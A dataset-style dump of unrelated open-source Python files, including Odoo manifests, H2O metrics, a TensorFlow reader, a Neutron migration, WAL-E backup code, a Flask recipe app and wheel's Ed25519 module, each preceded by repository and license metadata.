    for sal in buff.split("\n"):
        if sal.find(">") == -1 and sal.find("uxlst") == -1 :
            upr.append([ses,sal])
for u in upr:
    print u
ssh.close()
|
Antiun/purchase-workflow
|
purchase_discount/__openerp__.py
|
Python
|
agpl-3.0
| 1,604
| 0
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (c) 2014-2015 Serv. Tecnol. Avanzados - Pedro M. Baeza
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distribu
|
ted in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public Li
|
cense
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Odoo/OpenERP addon manifest: a single dict literal evaluated by the server.
{
    "name": "Purchase order lines with discounts",
    "author": "Tiny, "
              "Acysos S.L., "
              "Serv. Tecnol. Avanzados - Pedro M. Baeza, "
              "Odoo Community Association (OCA)",
    "version": "8.0.1.1",
    "contributors": [
        'Pedro M. Baeza',
    ],
    "category": "Purchase Management",
    # Modules that must be installed before this one.
    "depends": [
        "stock",
        "purchase",
    ],
    # View and report definitions loaded on install/update.
    "data": [
        "views/purchase_discount_view.xml",
        "views/report_purchaseorder.xml",
    ],
    "license": 'AGPL-3',
    "installable": True
}
|
h2oai/h2o-3
|
h2o-py/h2o/model/metrics_base.py
|
Python
|
apache-2.0
| 105,732
| 0.00419
|
# -*- encoding: utf-8 -*-
"""
Regression model.
:copyright: (c) 2016 H2O.ai
:license: Apache License Version 2.0 (see LICENSE for details)
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from h2o.model.confusion_matrix import ConfusionMatrix
from h2o.plot import decorate_plot_result, get_matplotlib_pyplot, RAISE_ON_FIGURE_ACCESS
from h2o.utils.compatibility import * # NOQA
from h2o.utils.metaclass import backwards_compatibility, deprecated_fn, h2o_meta, deprecated_params
from h2o.utils.typechecks import assert_is_type, assert_satisfies, is_type, numeric
@backwards_compatibility(
instance_attrs=dict(
giniCoef=lambda self, *args, **kwargs: self.gini(*args, **kwargs)
)
)
class MetricsBase(h2o_meta()):
"""
A parent class to house common metrics available for the various Metrics types.
The methods here are available across different model categories.
"""
def __init__(self, metric_json, on=None, algo=""):
# Yep, it's messed up...
if isinstance(metric_json, MetricsBase): metric_json = metric_json._metric_json
self._metric_json = metric_json
# train and valid and xval are not mutually exclusive -- could have a test. train and
# valid only make sense at model build time.
self._on_train = False
self._on_valid = False
self._on_xval = False
self._algo = algo
if on == "training_metrics":
self._on_train = True
elif on == "validation_metrics":
self._on_valid = True
elif on == "cross_validation_metrics":
self._on_xval = True
elif on is None:
pass
else:
raise ValueError("on expected to be train,valid,or xval. Got: " + str(on))
@classmethod
def make(cls, kvs):
"""Factory method to instantiate a MetricsBase object from the list of key-value pairs."""
return cls(metric_json=dict(kvs))
    def __repr__(self):
        # FIXME !!! __repr__ should never print anything, but return a string
        # Prints the full summary as a side effect (interactive display)
        # and returns an empty string so nothing is shown twice.
        self.show()
        return ""
    # TODO: convert to actual fields list
    def __getitem__(self, key):
        """Dict-style access into the raw metric JSON; None for missing keys."""
        return self._metric_json.get(key)
@staticmethod
def _has(dictionary, key):
return key in dictionary and dictionary[key] is not None
def show(self):
"""Display a short summary of the metrics.
:examples:
>>> from from h2o.estimators.gbm import H2OGradientBoostingEstimator
>>> cars = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/junit/cars_20mpg.csv")
>>> cars["economy_20mpg"] = cars["economy_20mpg"].asfactor()
>>> predictors = ["displacement","power","weight","acceleration","year"]
>>> response = "economy_20mpg"
>>> train, valid = cars.split_frame(ratios = [.8], seed = 1234)
>>> cars_gbm = H2OGradientBoostingEstimator(seed = 1234)
>>> cars_gbm.train(x = predictors,
... y = response,
... training_frame = train,
... validation_frame = valid)
>>> cars_gbm.show()
"""
if self._metric_json==None:
print("WARNING: Model metrics cannot be calculated and metric_json is empty due to the absence of the response column in your dataset.")
return
metric_type = self._metric_json['__meta']['schema_type']
types_w_glm = ['ModelMetricsRegressionGLM', 'ModelMetricsRegressionGLMGeneric', 'ModelMetricsBinomialGLM',
'ModelMetricsBinomialGLMGeneric', 'ModelMetricsHGLMGaussianGaussian',
'ModelMetricsHGLMGaussianGaussianGeneric']
types_w_clustering = ['ModelMetricsClustering']
types_w_mult = ['ModelMetricsMultinomial', 'ModelMetricsMultinomialGeneric']
types_w_ord = ['ModelMetricsOrdinal', 'ModelMetricsOrdinalGeneric']
types_w_bin = ['ModelMetricsBinomial', 'ModelMetricsBinomialGeneric', 'ModelMetricsBinomialGLM', 'ModelMetricsBinomialGLMGeneric']
types_w_r2 = ['ModelMetricsRegressionGLM', 'ModelMetricsRegressionGLMGeneric']
types_w_mean_residual_deviance = ['ModelMetricsRegressionGLM', 'ModelMetricsRegressionGLMGeneric',
'ModelMetricsRegression', 'ModelMetricsRegressionGeneric']
types_w_mean_absolute_error = ['ModelMetric
|
sRegressionGLM', 'ModelMetricsRegressionGLMGeneric',
'ModelMetricsRegression', 'ModelMetricsRegr
|
essionGeneric']
types_w_mean_per_class_error = ['ModelMetricsBinomial', 'ModelMetricsBinomialGeneric',
'ModelMetricsOrdinal', 'ModelMetricsOrdinalGeneric'] + types_w_mult
types_w_logloss = types_w_bin + types_w_mult+types_w_ord
types_w_dim = ["ModelMetricsGLRM"]
types_w_anomaly = ['ModelMetricsAnomaly']
types_w_cox = ['ModelMetricsRegressionCoxPH']
types_w_uplift = ['ModelMetricsBinomialUplift']
print()
print(metric_type + ": " + self._algo)
reported_on = "** Reported on {} data. **"
if self._on_train:
print(reported_on.format("train"))
elif self._on_valid:
print(reported_on.format("validation"))
elif self._on_xval:
print(reported_on.format("cross-validation"))
else:
print(reported_on.format("test"))
print()
if metric_type not in types_w_anomaly and metric_type not in types_w_uplift and \
metric_type not in types_w_clustering:
print("MSE: " + str(self.mse()))
print("RMSE: " + str(self.rmse()))
if metric_type in types_w_mean_absolute_error:
print("MAE: " + str(self.mae()))
print("RMSLE: " + str(self.rmsle()))
if metric_type in types_w_r2:
print("R^2: " + str(self.r2()))
if metric_type in types_w_mean_residual_deviance:
print("Mean Residual Deviance: " + str(self.mean_residual_deviance()))
if metric_type in types_w_logloss:
print("LogLoss: " + str(self.logloss()))
if metric_type in types_w_mean_per_class_error:
print("Mean Per-Class Error: %s" % self._mean_per_class_error())
if metric_type in types_w_glm:
if metric_type == 'ModelMetricsHGLMGaussianGaussian': # print something for HGLM
print("Standard error of fixed columns: "+str(self.hglm_metric("sefe")))
print("Standard error of random columns: "+str(self.hglm_metric("sere")))
print("Coefficients for fixed columns: "+str(self.hglm_metric("fixedf")))
print("Coefficients for random columns: "+str(self.hglm_metric("ranef")))
print("Random column indices: "+str(self.hglm_metric("randc")))
print("Dispersion parameter of the mean model (residual variance for LMM): "+str(self.hglm_metric("varfix")))
print("Dispersion parameter of the random columns (variance of random columns): "+str(self.hglm_metric("varranef")))
print("Convergence reached for algorithm: "+str(self.hglm_metric("converge")))
print("Deviance degrees of freedom for mean part of the model: "+str(self.hglm_metric("dfrefe")))
print("Estimates and standard errors of the linear prediction in the dispersion model: "+str(self.hglm_metric("summvc1")))
print("Estimates and standard errors of the linear predictor for the dispersion parameter of the random columns: "+str(self.hglm_metric("summvc2")))
print("Index of most influential observation (-1 if none): "+str(self.hglm_metric("bad")))
print("H-likelihood: "+str(self.hglm_metric("hlik")))
print("Profile log-likelihood profiled over random columns: "+str(self.hglm_metric("pvh")))
print("Adjusted profile log-likelihood profiled over fixed and random effects: "+str(self.hglm_metric("pbvh")))
print("Conditional AIC: "+str(self.hglm_metric("caic")))
else:
|
ml-101/templates
|
readers.py
|
Python
|
mit
| 1,577
| 0.001268
|
import tens
|
orflow as tf
import tensorflow.contrib.slim as slim
class BaseReader(object):
    """Abstract reader interface; concrete readers implement read()."""

    def read(self):
        """Subclasses must override this."""
        raise NotImplementedError()


class ImageReader(BaseReader):
    """Reads batches of fixed-size images (and optional labels) from TFRecords."""

    def __init__(self):
        # Dimensions must be configured via set_image_size() before read().
        self.width = None
        self.height = None

    def get_image_size(self):
        """Return the configured (width, height) pair."""
        return self.width, self.height

    def set_image_size(self, width, height):
        """Configure the expected width and height of each image."""
        self.width = width
        self.height = height

    def read(self, filename, num_classes, batch_size=256, feature_map=None):
        """Read up to *batch_size* examples and return (labels, images).

        Labels are one-hot (int32) when the feature map includes 'label',
        otherwise a zero label per image. Pixel values are scaled to [0, 1].
        """
        width, height = self.width, self.height
        assert width is not None and height is not None
        assert width > 0 and height > 0
        record_reader = tf.TFRecordReader()
        tf.add_to_collection(filename, batch_size)  # is this really needed?
        _key, serialized = record_reader.read_up_to(filename, batch_size)
        if feature_map is None:
            feature_map = {
                'label': tf.FixedLenFeature([], tf.int64),
                'image_raw': tf.FixedLenFeature([width * height], tf.int64),
            }
        parsed = tf.parse_example(serialized, features=feature_map)
        images = tf.cast(parsed["image_raw"], tf.float32) * (1. / 255)
        if feature_map.get('label') is None:
            # No label feature requested: emit a zero label per image.
            empty_labels = tf.reduce_sum(tf.zeros_like(images), axis=1)
            return empty_labels, images
        labels = tf.cast(parsed['label'], tf.int32)
        one_hot = tf.map_fn(lambda lbl: tf.cast(slim.one_hot_encoding(lbl, num_classes), tf.int32), labels)
        one_hot = tf.reshape(one_hot, [-1, num_classes])
        return one_hot, images
|
ntt-sic/neutron
|
neutron/db/migration/alembic_migrations/versions/53bbd27ec841_extra_dhcp_opts_supp.py
|
Python
|
apache-2.0
| 2,051
| 0.002438
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0
|
(the "License"); you may
# not us
|
e this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Extra dhcp opts support
Revision ID: 53bbd27ec841
Revises: 40dffbf4b549
Create Date: 2013-05-09 15:36:50.485036
"""
# revision identifiers, used by Alembic.
revision = '53bbd27ec841'
down_revision = '40dffbf4b549'
# Change to ['*'] if this migration applies to all plugins
migration_for_plugins = [
'neutron.plugins.openvswitch.ovs_neutron_plugin.OVSNeutronPluginV2'
]
from alembic import op
import sqlalchemy as sa
from neutron.db import migration
def upgrade(active_plugins=None, options=None):
    """Create the extradhcpopts table (one row per per-port DHCP option)."""
    # Skip entirely unless one of the plugins this migration targets
    # is active in the deployment.
    if not migration.should_run(active_plugins, migration_for_plugins):
        return

    op.create_table(
        'extradhcpopts',
        sa.Column('id', sa.String(length=36), nullable=False),
        sa.Column('port_id', sa.String(length=36), nullable=False),
        sa.Column('opt_name', sa.String(length=64), nullable=False),
        sa.Column('opt_value', sa.String(length=255), nullable=False),
        # Options are deleted together with their port.
        sa.ForeignKeyConstraint(['port_id'], ['ports.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('port_id', 'opt_name', name='uidx_portid_optname'))
def downgrade(active_plugins=None, options=None):
    """Drop the extradhcpopts table created by upgrade()."""
    if not migration.should_run(active_plugins, migration_for_plugins):
        return

    ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('extradhcpopts')
    ### end Alembic commands ###
|
tenstartups/wal-e
|
wal_e/operator/backup.py
|
Python
|
bsd-3-clause
| 23,283
| 0
|
import errno
import functools
import gevent
import gevent.pool
import itertools
import json
import os
import sys
from io import StringIO
from wal_e import log_help
from wal_e import storage
from wal_e import tar_partition
from wal_e.exception import UserException, UserCritical
from wal_e.worker import prefetch
from wal_e.worker import (WalSegment,
WalUploader,
PgBackupStatements,
PgControlDataParser,
PartitionUploader,
TarUploadPool,
WalTransferGroup,
uri_put_file,
do_lzop_get)
# File mode on directories created during restore process
DEFAULT_DIR_MODE = 0o700
# Provides guidence in object names as to the version of the file
# structure.
FILE_STRUCTURE_VERSION = storage.CURRENT_VERSION
logger = log_help.WalELogger(__name__)
class Backup(object):
    def __init__(self, layout, creds, gpg_key_id):
        # layout: storage layout describing where backup objects live.
        # creds: credentials used when opening storage connections.
        # gpg_key_id: GPG key id; None appears to disable encryption
        # (only its is-not-None-ness is consulted, e.g. in database_fetch).
        self.layout = layout
        self.creds = creds
        self.gpg_key_id = gpg_key_id
        # Exceptions collected from worker greenlets.
        self.exceptions = []
    def new_connection(self):
        # NOTE(review): self.cinfo is not assigned in __init__; presumably
        # a subclass or external setup provides it -- confirm before use.
        return self.cinfo.connect(self.creds)
    def backup_list(self, query, detail):
        """
        Lists base backups and basic information about them

        Writes tab-separated rows (one per backup, BackupInfo fields as
        header) to stdout. *query* narrows the listing; *detail* is
        forwarded to _backup_list.
        """
        import csv

        from wal_e.storage.base import BackupInfo

        bl = self._backup_list(detail)

        # If there is no query, return an exhaustive list, otherwise
        # find a backup instead.
        if query is None:
            bl_iter = bl
        else:
            bl_iter = bl.find_all(query)

        # TODO: support switchable formats for difference needs.
        w_csv = csv.writer(sys.stdout, dialect='excel-tab')
        w_csv.writerow(BackupInfo._fields)

        for bi in bl_iter:
            w_csv.writerow([getattr(bi, k) for k in BackupInfo._fields])

        sys.stdout.flush()
def database_fetch(self, pg_cluster_dir, backup_name,
blind_restore, restore_spec, pool_size):
if os.path.exists(os.path.join(pg_cluster_dir, 'postmaster.pid')):
hint = ('Shut down postgres. If there is a stale lockfile, '
'then remove it after being very sure postgres is not '
'running.')
raise UserException(
msg='attempting to overwrite a live data directory',
detail='Found a postmaster.pid lockfile, and aborting',
hint=hint)
bl = self._backup_list(False)
backups = list(bl.find_all(backup_name))
assert len(backups) <= 1
if len(backups) == 0:
raise UserException(
msg='no backups found for fetching',
detail=('No backup matching the query {0} '
'was able to be located.'.format(backup_name)))
elif len(backups) > 1:
raise UserException(
msg='more than one backup found for fetching',
detail=('More than one backup matching the query {0} was able '
'to be located.'.format(backup_name)),
hint='To list qualifying backups, '
'try "wal-e backup-list QUERY".')
# There must be exactly one qualifying backup at this point.
assert len(backups) == 1
assert backups[0] is not None
backup_info = backups[0]
backup_info.load_detail(self.new_connection())
self.layout.basebackup_tar_partition_directory(backup_info)
if restore_spec is not None:
if restore_spec != 'SOURCE':
if not os.path.isfile(restore_spec):
raise UserException(
msg='Restore specification does not exist',
detail='File not found: %s'.format(restore_spec),
hint=('Provide valid json-formatted restoration '
'specification, or pseudo-name "SOURCE" to '
'restore using the specification from the '
'backup progenitor.'))
with open(restore_spec, 'r') as fs:
spec = json.load(fs)
backup_info.spec.update(spec)
if 'base_prefix' not in backup_info.spec \
or not backup_info.spec['base_prefix']:
backup_info.spec['base_prefix'] = pg_cluster_dir
self._build_restore_paths(backup_info.spec)
else:
# If the user hasn't passed in a restoration specification
# use pg_cluster_dir as the resore prefix
backup_info.spec['base_prefix'] = pg_cluster_dir
if not blind_restore:
self._verify_restore_paths(backup_info.spec)
connections = []
for i in range(pool_size):
connections.append(self.new_connection())
partition_iter = self.worker.TarPartitionLister(
connections[0], self.layout, backup_info)
assert len(connections) == pool_size
fetchers = []
for i in range(pool_size):
fetchers.append(self.worker.BackupFetcher(
connections[i], self.layout, backup_info,
backup_info.spec['base_prefix'],
(self.gpg_key_id is not None)))
assert len(fetchers) == pool_size
p = gevent.pool.Pool(size=pool_size)
fetcher_cycle = itertools.cycle(fetchers)
for part_name in partition_iter:
p.spawn(
self._exception_gather_guard(
next(fetcher_cycle).fetch_partition),
part_name)
p.join(raise_error=True)
def database_backup(self, data_directory, *args, **kwargs):
"""Uploads a PostgreSQL file cluster to S3 or Windows Azure Blob
Service
Mechanism: just wraps _upload_pg_cluster_dir with
start/stop backup actions with exception handling.
In particular there is a 'finally' block to stop the backup in
most situations.
"""
upload_good = False
backup_stop_good = False
while_offline = False
start_backup_info = None
if 'while_offline' in kwargs:
while_offline = kwargs.pop('while_offline')
try:
if not while_offline:
start_backup_info = PgBackupStatements.run_start_backup()
version = PgBackupStatements.pg_version()['version']
else:
if os.path.exists(os.path.join(data_directory,
'postmaster.pid')):
hint = ('Shut down postgres. '
'If there is a stale lockfile, '
'then remove it after being very sure postgres '
'is not running.')
raise UserException(
msg='while_offline set, but pg looks to be running',
detail='Found a postmaster.pid lockfile, and aborting',
hint=hint)
ctrl_data = PgControlDataParser(data_directory)
start_backup_info = ctrl_data.last_xlog_file_name_and_offset()
version = ctrl_data.pg_version()
ret_tuple
|
= self._upload_pg_cluster_dir(
start_backup_info, data_directory, version=version, *args,
**kwargs)
spec, uploaded_to, expanded_size_bytes = ret_tuple
upload_good = True
finally:
if not upload_good:
logger.warning(
|
'blocking on sending WAL segments',
detail=('The backup was not completed successfully, '
'but we have to wait anyway. '
'See README: TODO about pg_cancel_backup'))
if not while_offline:
stop_backup_info = PgBackupStatements.run_stop_backup()
else:
stop_backup_info = start_backup_info
backup_stop_good = True
# XXX: Ugly, this is mo
|
kkelk/MeanRecipes
|
meanrecipes/__main__.py
|
Python
|
bsd-2-clause
| 832
| 0.009615
|
#!/usr/bin/env python3
from flask import Flask, url_for, render_template, make_response, request
from recipe import Recipe
from sources.allrecipes import AllRecipesSource
from average import average
app = Flask(__name__)
@app.route('/')
def index():
    """Serve the landing page."""
    return render_template('index.html')
@app.route('/recipe/search/<term>')
def recipe(term=None):
    """Search AllRecipes for *term* and return an averaged recipe as JSON.

    The optional ``silliness`` query parameter (0-100, default 50) is
    passed to average() as a 0-1 fraction.
    """
    silliness = request.args.get('silliness', 50)
    source = AllRecipesSource()
    intermediates = list(source.search(term))
    # Start from an empty working recipe titled after the search term.
    working = Recipe(term, [], [])
    recipe = average(intermediates, working, silliness=float(silliness) / 100)
    # The payload is rendered via the recipe.json template; set the JSON
    # mimetype explicitly since render_template defaults to HTML.
    resp = make_response(render_template('recipe.json', title=recipe.title, ingredients=recipe.ingredients, method=recipe.method))
    resp.mimetype = 'application/json'
    return resp
if __name__ == '__main__':
app.run(debug = True)
|
h4/fuit-webdev
|
examples/lesson2/1.4/1.4.8.py
|
Python
|
mit
| 132
| 0
|
# -*- encoding: utf-8 -*-
"""
A string with special characters (Python 2 example).
"""
s = 'a\0b\0c'
# NUL bytes ('\0') are ordinary characters: len(s) is 5 even though the
# printed text may look shorter in a terminal.
print s
print len(s)
|
bmya/odoo-support
|
web_support_client/models/__init__.py
|
Python
|
lgpl-3.0
| 382
| 0
|
# -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file i
|
n module root
# directory
##############################################################################
from . import support
from . import res_users
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidt
|
h=4:
|
zwChan/VATEC
|
~/eb-virt/Lib/site-packages/wheel/signatures/djbec.py
|
Python
|
apache-2.0
| 6,755
| 0.014656
|
# Ed25519 digital signatures
# Based on http://ed25519.cr.yp.to/python/ed25519.py
# See also http://ed25519.cr.yp.to/software.html
# Adapted by Ron Garret
# Sped up considerably using coordinate transforms found on:
# http://www.hyperelliptic.org/EFD/g1p/auto-twisted-extended-1.html
# Specifically add-2008-hwcd-4 and dbl-2008-hwcd
# Python 2/3 compatibility shims: probe for the `unicode` builtin to detect
# Python 2, and define byte-handling helpers accordingly.
try: # pragma nocover
    unicode
    PY3 = False
    def asbytes(b):
        """Convert array of integers to byte string"""
        return ''.join(chr(x) for x in b)
    def joinbytes(b):
        """Convert array of bytes to byte string"""
        return ''.join(b)
    def bit(h, i):
        """Return i'th bit of bytestring h"""
        return (ord(h[i//8]) >> (i%8)) & 1
except NameError: # pragma nocover
    # Python 3: bytes() performs both conversions, and indexing a bytes
    # object yields ints directly (no ord() needed).
    PY3 = True
    asbytes = bytes
    joinbytes = bytes
    def bit(h, i):
        """Return i'th bit of bytestring h"""
        return (h[i//8] >> (i%8)) & 1
import hashlib

# Ed25519 domain parameters:
b = 256  # bit length of key/point/integer encodings (32 bytes)
q = 2**255 - 19  # field prime
l = 2**252 + 27742317777372353535851937790883648493  # group order (reduces S in signature())
def H(m):
    """SHA-512 of *m* as raw bytes -- the hash function used throughout Ed25519."""
    hasher = hashlib.sha512(m)
    return hasher.digest()
def expmod(b, e, m):
    """Modular exponentiation: return b**e mod m (e >= 0).

    Kept for API compatibility, but delegates to the built-in
    three-argument pow(), which is an iterative C implementation --
    the original recursive square-and-multiply recursed once per
    exponent bit and paid Python call overhead each time.
    """
    # Preserve the original's exact base case (returns 1 even when m == 1).
    if e == 0: return 1
    return pow(b, e, m)
# Can probably get some extra speedup here by replacing this with
# an extended-euclidean, but performance seems OK without that
def inv(x):
    """Multiplicative inverse of x mod the field prime q (Fermat's little theorem)."""
    return expmod(x, q-2, q)
d = -121665 * inv(121666)
I = expmod(2,(q-1)//4,q)
def xrecover(y):
    """Recover the even x-coordinate for a given y on the Edwards curve.

    Solves x^2 = (y^2 - 1) / (d*y^2 + 1) mod q; the candidate root is
    corrected with I = sqrt(-1) when needed, then negated to make x even.
    """
    xx = (y*y-1) * inv(d*y*y+1)
    x = expmod(xx,(q+3)//8,q)
    # If x is not actually a square root of xx, multiply by I = sqrt(-1) mod q.
    if (x*x - xx) % q != 0: x = (x*I) % q
    # Canonical choice: return the even root.
    if x % 2 != 0: x = q-x
    return x
By = 4 * inv(5)
Bx = xrecover(By)
B = [Bx % q,By % q]
#def edwards(P,Q):
# x1 = P[0]
# y1 = P[1]
# x2 = Q[0]
# y2 = Q[1]
# x3 = (x1*y2+x2*y1) * inv(1+d*x1*x2*y1*y2)
# y3 = (y1*y2+x1*x2) * inv(1-d*x1*x2*y1*y2)
# return (x3 % q,y3 % q)
#def scalarmult(P,e):
# if e == 0: return [0,1]
# Q = scalarmult(P,e/2)
# Q = edwards(Q,Q)
# if e & 1: Q = edwards(Q,P)
# return Q
# Faster (!) version based on:
# http://www.hyperelliptic.org/EFD/g1p/auto-twisted-extended-1.html
def xpt_add(pt1, pt2):
    """Add two points in extended twisted-Edwards coordinates (X, Y, Z, T).

    Formula add-2008-hwcd-4 (see the URL in the header comment); all
    arithmetic is modulo q.
    """
    (X1, Y1, Z1, T1) = pt1
    (X2, Y2, Z2, T2) = pt2
    A = ((Y1-X1)*(Y2+X2)) % q
    B = ((Y1+X1)*(Y2-X2)) % q
    C = (Z1*2*T2) % q
    D = (T1*2*Z2) % q
    E = (D+C) % q
    F = (B-A) % q
    G = (B+A) % q
    H = (D-C) % q
    X3 = (E*F) % q
    Y3 = (G*H) % q
    Z3 = (F*G) % q
    T3 = (E*H) % q
    return (X3, Y3, Z3, T3)

def xpt_double (pt):
    """Double a point in extended coordinates (formula dbl-2008-hwcd)."""
    (X1, Y1, Z1, _) = pt
    A = (X1*X1)
    B = (Y1*Y1)
    C = (2*Z1*Z1)
    D = (-A) % q
    J = (X1+Y1) % q
    E = (J*J-A-B) % q
    G = (D+B) % q
    F = (G-C) % q
    H = (D-B) % q
    X3 = (E*F) % q
    Y3 = (G*H) % q
    Z3 = (F*G) % q
    T3 = (E*H) % q
    return (X3, Y3, Z3, T3)

def pt_xform (pt):
    """Lift an affine point (x, y) to extended coordinates (x, y, 1, x*y)."""
    (x, y) = pt
    return (x, y, 1, (x*y)%q)

def pt_unxform (pt):
    """Project extended coordinates back to an affine point (divide by Z)."""
    (x, y, z, _) = pt
    return ((x*inv(z))%q, (y*inv(z))%q)

def xpt_mult (pt, n):
    """Scalar multiply n*pt in extended coordinates (recursive double-and-add)."""
    if n==0: return pt_xform((0,1))  # (0, 1) is the group identity
    _ = xpt_double(xpt_mult(pt, n>>1))
    return xpt_add(_, pt) if n&1 else _

def scalarmult(pt, e):
    """Scalar multiply e*pt on affine points, via extended coordinates."""
    return pt_unxform(xpt_mult(pt_xform(pt), e))
def encodeint(y):
    """Encode integer y as b//8 (32) little-endian bytes."""
    bits = [(y >> i) & 1 for i in range(b)]
    e = [(sum([bits[i * 8 + j] << j for j in range(8)]))
         for i in range(b//8)]
    return asbytes(e)

def encodepoint(P):
    """Encode point P: 255 bits of y (little-endian) with the parity of x in the top bit."""
    x = P[0]
    y = P[1]
    bits = [(y >> i) & 1 for i in range(b - 1)] + [x & 1]
    e = [(sum([bits[i * 8 + j] << j for j in range(8)]))
         for i in range(b//8)]
    return asbytes(e)
def publickey(sk):
    """Derive the 32-byte public key from secret-key bytes sk.

    The secret scalar a is the clamped low half of SHA-512(sk): bit b-2
    is set, and bits 0-2 and b-1 are cleared (via the summation range).
    """
    h = H(sk)
    a = 2**(b-2) + sum(2**i * bit(h,i) for i in range(3,b-2))
    A = scalarmult(B,a)
    return encodepoint(A)

def Hint(m):
    """SHA-512 of m interpreted as a little-endian (2*b)-bit integer."""
    h = H(m)
    return sum(2**i * bit(h,i) for i in range(2*b))

def signature(m,sk,pk):
    """Sign message m with secret key sk / public key pk; returns R || S (64 bytes).

    The nonce r is derived deterministically from the upper half of
    SHA-512(sk) and the message, per the Ed25519 construction.
    """
    h = H(sk)
    a = 2**(b-2) + sum(2**i * bit(h,i) for i in range(3,b-2))
    inter = joinbytes([h[i] for i in range(b//8,b//4)])
    r = Hint(inter + m)
    R = scalarmult(B,r)
    S = (r + Hint(encodepoint(R) + pk + m) * a) % l
    return encodepoint(R) + encodeint(S)
def isoncurve(P):
    """True iff affine P satisfies -x^2 + y^2 = 1 + d*x^2*y^2 (mod q)."""
    x = P[0]
    y = P[1]
    return (-x*x + y*y - 1 - d*x*x*y*y) % q == 0

def decodeint(s):
    """Decode bytes s as a little-endian b-bit integer."""
    return sum(2**i * bit(s,i) for i in range(0,b))

def decodepoint(s):
    """Decode a point: low 255 bits give y; the top bit selects the parity of x."""
    y = sum(2**i * bit(s,i) for i in range(0,b-1))
    x = xrecover(y)
    if x & 1 != bit(s,b-1): x = q-x
    P = [x,y]
    if not isoncurve(P): raise Exception("decoding point that is not on curve")
    return P

def checkvalid(s, m, pk):
    """Verify signature s on message m under public key pk.

    Checks the Ed25519 equation S*B == R + Hint(R || pk || m) * A.
    Raises on malformed lengths or off-curve points; returns a bool.
    """
    if len(s) != b//4: raise Exception("signature length is wrong")
    if len(pk) != b//8: raise Exception("public-key length is wrong")
    R = decodepoint(s[0:b//8])
    A = decodepoint(pk)
    S = decodeint(s[b//8:b//4])
    h = Hint(encodepoint(R) + pk + m)
    v1 = scalarmult(B,S)
    # v2 = edwards(R,scalarmult(A,h))
    # Same sum computed in the faster extended coordinates:
    v2 = pt_unxform(xpt_add(pt_xform(R), pt_xform(scalarmult(A, h))))
    return v1==v2
##########################################################
#
# Curve25519 reference implementation by Matthew Dempsky, from:
# http://cr.yp.to/highspeed/naclcrypto-20090310.pdf
# P = 2 ** 255 - 19
P = q
A = 486662
#def expmod(b, e, m):
# if e == 0: return 1
# t = expmod(b, e / 2, m) ** 2 % m
# if e & 1: t = (t * b) % m
# return t
# def inv(x): return expmod(x, P - 2, P)
def add(n, m, d):
    """Montgomery differential addition: given points n, m and their
    difference d (each an (x, z) projective pair), return n + m.

    NOTE: the parameter d intentionally shadows the module-level Edwards
    constant d within this function.
    """
    (xn, zn) = n
    (xm, zm) = m
    (xd, zd) = d
    x = 4 * (xm * xn - zm * zn) ** 2 * zd
    z = 4 * (xm * zn - zm * xn) ** 2 * xd
    return (x % P, z % P)

def double(n):
    """Montgomery doubling of the (x, z) pair n (curve constant A = 486662)."""
    (xn, zn) = n
    x = (xn ** 2 - zn ** 2) ** 2
    z = 4 * xn * zn * (xn ** 2 + A * xn * zn + zn ** 2)
    return (x % P, z % P)

def curve25519(n, base=9):
    """Curve25519 scalar multiplication: the x-coordinate of n * base point."""
    one = (base,1)
    two = double(one)
    # f(m) evaluates to a tuple
    # containing the mth multiple and the
    # (m+1)th multiple of base.
    def f(m):
        # Montgomery ladder, recursing over the bits of m.
        if m == 1: return (one, two)
        (pm, pm1) = f(m // 2)
        if (m & 1):
            return (add(pm, pm1, one), double(pm1))
        return (double(pm), add(pm, pm1, one))
    ((x,z), _) = f(n)
    return (x * inv(z)) % P
import random  # NOTE(review): `random` is not cryptographically secure; fine for the self-tests below only

def genkey(n=0):
    """Return a clamped Curve25519 secret scalar (random when n is 0/falsy).

    Clamping: clear the 3 low bits, clear bit 255, set bit 254.
    """
    n = n or random.randint(0,P)
    n &= ~7
    n &= ~(128 << 8 * 31)
    n |= 64 << 8 * 31
    return n
#def str2int(s):
# return int(hexlify(s), 16)
# # return sum(ord(s[i]) << (8 * i) for i in range(32))
#
#def int2str(n):
# return unhexlify("%x" % n)
# # return ''.join([chr((n >> (8 * i)) & 255) for i in range(32)])
#################################################
def dsa_test():
import os
msg = str(random.randint(q,q+q)).encode('utf-8')
sk = os.urandom(32)
pk = publickey(sk)
sig = signature(msg, sk, pk)
return checkvalid(sig, msg, pk)
def dh_test():
  """Diffie-Hellman sanity check: both sides must derive the same shared key."""
  key_one = genkey()
  key_two = genkey()
  shared_12 = curve25519(key_one, curve25519(key_two))
  shared_21 = curve25519(key_two, curve25519(key_one))
  return shared_12 == shared_21
|
ZmG/openwhisk-tutorial
|
deploy_settings/urls.py
|
Python
|
apache-2.0
| 1,114
| 0.01167
|
#
# Copyright 2015-2016 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
